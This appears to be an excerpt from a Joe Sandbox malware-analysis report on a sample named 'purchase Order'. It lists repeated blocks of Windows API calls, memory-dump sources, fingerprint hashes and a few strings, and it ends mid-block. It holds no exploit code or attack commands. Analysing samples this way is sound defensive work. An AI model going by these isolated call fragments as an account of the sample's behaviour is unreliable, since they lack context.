                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                        • String ID:
                                                        • API String ID: 2664167353-0
                                                        • Opcode ID: e397994e1c93519714ad9aceeb3e78eb345cb3f27d26676597f9d4e79ee3d575
                                                        • Instruction ID: ac7353cfe12f22354064a4f3da93533d97dbf6905c5006a3ad4209b74648f069
                                                        • Opcode Fuzzy Hash: e397994e1c93519714ad9aceeb3e78eb345cb3f27d26676597f9d4e79ee3d575
                                                        • Instruction Fuzzy Hash: E51108331087466FDB31AFA5DCC5D9F77A8EF417747100929FE2486151DB31C911A6A0
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C7ABD7
                                                        • GetLastError.KERNEL32(?,00C7A69F,?,?,?), ref: 00C7ABE1
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00C7A69F,?,?,?), ref: 00C7ABF0
                                                        • HeapAlloc.KERNEL32(00000000,?,00C7A69F,?,?,?), ref: 00C7ABF7
                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C7AC0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: e510879821943f68b0a04e388148569402db1ecdde90b0d86952d35cc0765eeb
                                                        • Instruction ID: a66540ccafa66d6579bf9145c05233b5fcfed4ea5ecc3e0df8b9f777f808571a
                                                        • Opcode Fuzzy Hash: e510879821943f68b0a04e388148569402db1ecdde90b0d86952d35cc0765eeb
                                                        • Instruction Fuzzy Hash: BE011DB1200204BFDB114FA5DC48E6F3BADEF897957144429F55AC3260D671DD41DB61
                                                        APIs
                                                        • CLSIDFromProgID.OLE32 ref: 00C79ADC
                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00C79AF7
                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00C79B05
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00C79B15
                                                        • CLSIDFromString.OLE32(?,?), ref: 00C79B21
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: 0786ffbf28e63f6c2b1270c68a0920ad9137da6d9543dd3a704c22cd9bf4c2f1
                                                        • Instruction ID: 1ab887f85fc47e39e9398e074def4fc1367fe160f65cf968f829a048517310bd
                                                        • Opcode Fuzzy Hash: 0786ffbf28e63f6c2b1270c68a0920ad9137da6d9543dd3a704c22cd9bf4c2f1
                                                        • Instruction Fuzzy Hash: 04012C76600215ABDB214F64ED44F9EBABDEB44791F148038F90AD2260D770DE409BA0
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C87A74
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C87A82
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C87A8A
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C87A94
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C87AD0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 279074d8de3816e6834956fee04ebf8a7989df8d235a777352bf4b6038452ed4
                                                        • Instruction ID: 2147d0ea86ebad6e145e0cbfb913c9626a9c2ffc5f68dfa21fb47ad80bfc7342
                                                        • Opcode Fuzzy Hash: 279074d8de3816e6834956fee04ebf8a7989df8d235a777352bf4b6038452ed4
                                                        • Instruction Fuzzy Hash: BE012932C04629EBCF04AFE5DC88BEDBB78FB08715F150595E502B2150EB309A9097A5
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C7AADA
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C7AAE4
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C7AAF3
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C7AAFA
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C7AB10
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 9f45d088174bf77ad2687ac85df0a4a170a6216de3142640e46908d4c6635d3d
                                                        • Instruction ID: 03750f8fc7f926ba510f73c67358b8e5e8123b5ee921cc4f30947edda5713ec0
                                                        • Opcode Fuzzy Hash: 9f45d088174bf77ad2687ac85df0a4a170a6216de3142640e46908d4c6635d3d
                                                        • Instruction Fuzzy Hash: 2DF04F712012086FEB110FA5EC88F6F3B6DFF85794F044039F956C7190CA60D9029A61
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C7AA79
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C7AA83
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C7AA92
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C7AA99
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C7AAAF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 0586aa94fe128217d73e0ac0662e7d7ebd1131c4dd54d13d91b50264664bcd96
                                                        • Instruction ID: 0bbffd13279c4138d9246284ed078eb85798fade54c010216815dfd5ee13e6dd
                                                        • Opcode Fuzzy Hash: 0586aa94fe128217d73e0ac0662e7d7ebd1131c4dd54d13d91b50264664bcd96
                                                        • Instruction Fuzzy Hash: F0F04F712002046FEB115FA5EC89F6F3BACFF89764F044429F956C71A0DA60DC42DB61
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00C7EC94
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C7ECAB
                                                        • MessageBeep.USER32(00000000), ref: 00C7ECC3
                                                        • KillTimer.USER32(?,0000040A), ref: 00C7ECDF
                                                        • EndDialog.USER32(?,00000001), ref: 00C7ECF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 2d5b27ea89be08c33bbb62319bce0606ede8c6a78c9a3225074e9992c150041a
                                                        • Instruction ID: dd2b1add64d6868cbfe8b34436254fce65b2b2ab031168e969da670e57384354
                                                        • Opcode Fuzzy Hash: 2d5b27ea89be08c33bbb62319bce0606ede8c6a78c9a3225074e9992c150041a
                                                        • Instruction Fuzzy Hash: 6C018175500704ABEB255F10DE4EF9A77B8FB04705F0045A9F697A14E0DBF0AA94CB45
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 00C5B0BA
                                                        • StrokeAndFillPath.GDI32(?,?,00CBE680,00000000,?,?,?), ref: 00C5B0D6
                                                        • SelectObject.GDI32(?,00000000), ref: 00C5B0E9
                                                        • DeleteObject.GDI32 ref: 00C5B0FC
                                                        • StrokePath.GDI32(?), ref: 00C5B117
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: e9cd3906ac8b376bbe21654bd56d87b031933fb16499fa2c6065b6688968cf0c
                                                        • Instruction ID: 2738d2b68a367e9b0efea8c787a1d2ae56c6f7d754f8b58a33f6e02db5eb3973
                                                        • Opcode Fuzzy Hash: e9cd3906ac8b376bbe21654bd56d87b031933fb16499fa2c6065b6688968cf0c
                                                        • Instruction Fuzzy Hash: 80F0B678400644AFDB219F69EC09B593FA5B710362F488325F82A851F0C772899ADF64
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00C8F2DA
                                                        • CoCreateInstance.OLE32(00CCDA7C,00000000,00000001,00CCD8EC,?), ref: 00C8F2F2
                                                        • CoUninitialize.OLE32 ref: 00C8F555
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize
                                                        • String ID: .lnk
                                                        • API String ID: 948891078-24824748
                                                        • Opcode ID: 7d71295096d344ee15a5a6c3623dc1f7e4f3d049166066422a7f816fc4e86931
                                                        • Instruction ID: d26872d3e701cf21b53d0c6e1824614585954d4ae31807006a7def133e7fe594
                                                        • Opcode Fuzzy Hash: 7d71295096d344ee15a5a6c3623dc1f7e4f3d049166066422a7f816fc4e86931
                                                        • Instruction Fuzzy Hash: 00A13C75104201AFD300EF64C881EAFB7E8FF99315F00492DF556971A2DB70EA49DB92
                                                        APIs
                                                          • Part of subcall function 00C4660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C453B1,?,?,00C461FF,?,00000000,00000001,00000000), ref: 00C4662F
                                                        • CoInitialize.OLE32(00000000), ref: 00C8E85D
                                                        • CoCreateInstance.OLE32(00CCDA7C,00000000,00000001,00CCD8EC,?), ref: 00C8E876
                                                        • CoUninitialize.OLE32 ref: 00C8E893
                                                          • Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
                                                          • Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        • Opcode ID: 754e3c089938570471d2b6543c09b814b04abe161bb9f0bdc3f7331de4b02aba
                                                        • Instruction ID: bc408919506a4aaad8e186ee4d669461d86ec0abf4306e57fb0d86c648a87b0a
                                                        • Opcode Fuzzy Hash: 754e3c089938570471d2b6543c09b814b04abe161bb9f0bdc3f7331de4b02aba
                                                        • Instruction Fuzzy Hash: 83A122356043019FCB14EF14C484A6EBBE5FF89724F048998F9A69B3A2CB31ED45CB91
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 00C632ED
                                                          • Part of subcall function 00C6E0D0: __87except.LIBCMT ref: 00C6E10B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        • Opcode ID: 6e61f0fbfba5b0e0e8456bdd6b896ebf0b7ef663a0e550e3857a31001d3641fd
                                                        • Instruction ID: c584d0137a9341435cfb036cddc101c27b2e89ddca54f6b02742252358f91e84
                                                        • Opcode Fuzzy Hash: 6e61f0fbfba5b0e0e8456bdd6b896ebf0b7ef663a0e550e3857a31001d3641fd
                                                        • Instruction Fuzzy Hash: 32515A75A0924196CB316714CDE137E6BD4DB41710F248D2AF4E6822FAEF388F85E646
                                                        APIs
                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00CDDC50,?,0000000F,0000000C,00000016,00CDDC50,?), ref: 00C84645
                                                          • Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
                                                          • Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF
                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00C846C5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                        • String ID: REMOVE$THIS
                                                        • API String ID: 3797816924-776492005
                                                        • Opcode ID: bcc88f1fc6a7aca3c3cec056e8bc2d8a863eb8e261838cdc54aa4d915ae50f02
                                                        • Instruction ID: 6ee51d247edb01e2fdc8aade274c38f82682508a8b891a0813a459cdb302a045
                                                        • Opcode Fuzzy Hash: bcc88f1fc6a7aca3c3cec056e8bc2d8a863eb8e261838cdc54aa4d915ae50f02
                                                        • Instruction Fuzzy Hash: 29418274A0021A9FCF04EF64C881AAEB7B5FF49308F148069F916AB2A2DB34DD45DB54
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CDDC00,00000000,?,?,?,?), ref: 00CAA6D8
                                                        • GetWindowLongW.USER32 ref: 00CAA6F5
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CAA705
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: c59b671ccb780d221e8a69e302f5146a9506dede2ee75b6d304a0ee37c3a8807
                                                        • Instruction ID: b9992082c80352ce905af54160a30fbf6c53f3ba2ad5b86ec9b5a495b6125531
                                                        • Opcode Fuzzy Hash: c59b671ccb780d221e8a69e302f5146a9506dede2ee75b6d304a0ee37c3a8807
                                                        • Instruction Fuzzy Hash: 81318E35100606AFDB158E34CC45BEB7BA9EB4A328F244725F975D32E0C770AD50DB55
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CAA15E
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CAA172
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CAA196
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: c6af6d5cb6cf1134e71d172c2d4705f5c2a7136122a7e95d2fa9225c3e1b1e49
                                                        • Instruction ID: e1ad60e923255c6685fc2bc86c8b74c830d7d21d692280a0c233c9e8f260499b
                                                        • Opcode Fuzzy Hash: c6af6d5cb6cf1134e71d172c2d4705f5c2a7136122a7e95d2fa9225c3e1b1e49
                                                        • Instruction Fuzzy Hash: 8C21AD32500219BBDF158F94CC42FEE3B79EF49718F110214FA56AB190D7B5A850DBA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CAA941
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CAA94F
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CAA956
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        • Opcode ID: fb441532c41962458a2628e3f9acd270cab946bbe8770cd52dd7056ec806738f
                                                        • Instruction ID: 80379fe96a532e84d021dfb2c9c6df75ab966e884c5f77845d3f452978bac678
                                                        • Opcode Fuzzy Hash: fb441532c41962458a2628e3f9acd270cab946bbe8770cd52dd7056ec806738f
                                                        • Instruction Fuzzy Hash: E621B2B520020AAFEB10DF24CC81E7737ACEF4A368B450059FA15973A1CB31EC11DB61
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CA9A30
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CA9A40
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CA9A65
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 49b1d2ba6603705620197cc53196afa83e5eb19500950d532671dd4e09b708b2
                                                        • Instruction ID: 58f9f9a1722ed1710ec22899d8a1b63e9d6d061531d81b833965cf59abf5863e
                                                        • Opcode Fuzzy Hash: 49b1d2ba6603705620197cc53196afa83e5eb19500950d532671dd4e09b708b2
                                                        • Instruction Fuzzy Hash: 7F21C532610119BFDB218F54CC86FBF3BBAEF8A764F018129F959971A0C6719C51D7A0
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C7B5D2
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C7B5E9
                                                        • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00C7B621
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
